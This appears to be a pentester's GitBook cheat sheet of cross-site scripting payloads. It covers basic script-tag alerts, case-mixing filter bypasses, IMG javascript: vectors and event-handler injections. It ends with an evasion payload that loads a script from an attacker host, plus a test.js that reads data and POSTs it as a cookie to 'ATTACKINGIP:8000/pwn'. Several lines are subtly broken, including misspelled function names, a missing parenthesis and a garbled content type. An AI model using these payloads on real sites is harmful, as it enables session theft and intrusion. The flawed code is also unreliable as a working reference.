Powered by GitBook

Examples

This is a good list:

https://www.linkedin.com/pulse/20140812222156-79939846-xss-vectors-you-may-need-as-a-pen-tester

No security

<script>alert(1)</script>

Imagine that the server sanitizes <script>. To bypass that we can use:
<SCrIpt>alert(2)</ScRiPt>
<script type=text/javascript>alert(2)</script>

Using the IMG-tag

<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG onmouseover="alert('xxs')">

Onmouseover

<a onmouseover="alert(2)">d</a>

Evasion Attempts

<Img src="x/><script>eval(String.fromCharCode(document.write('<script src="http://ATTACKINGIP/test.js"></script>');))</script>">


test.js
var req1 = new XMLHttpRequest();
req1.open('GET','http://localhost:8000/vasrsasd',false);
req1.send();
var response = req1.responseText;
var req2 = new XMLHttpRequest();
var params = "cookie=" + encdoeURIComponenet(response);
req2.open('POST', 'http://ATTACKINGIP:8000/pwn', true;
req2.setRequestHeader('Content-Type', 'application/x-ww-form-urlencoded');
req2.send(params);


should create url encodeded data file, can grab cookie from

results matching ""

No results matching ""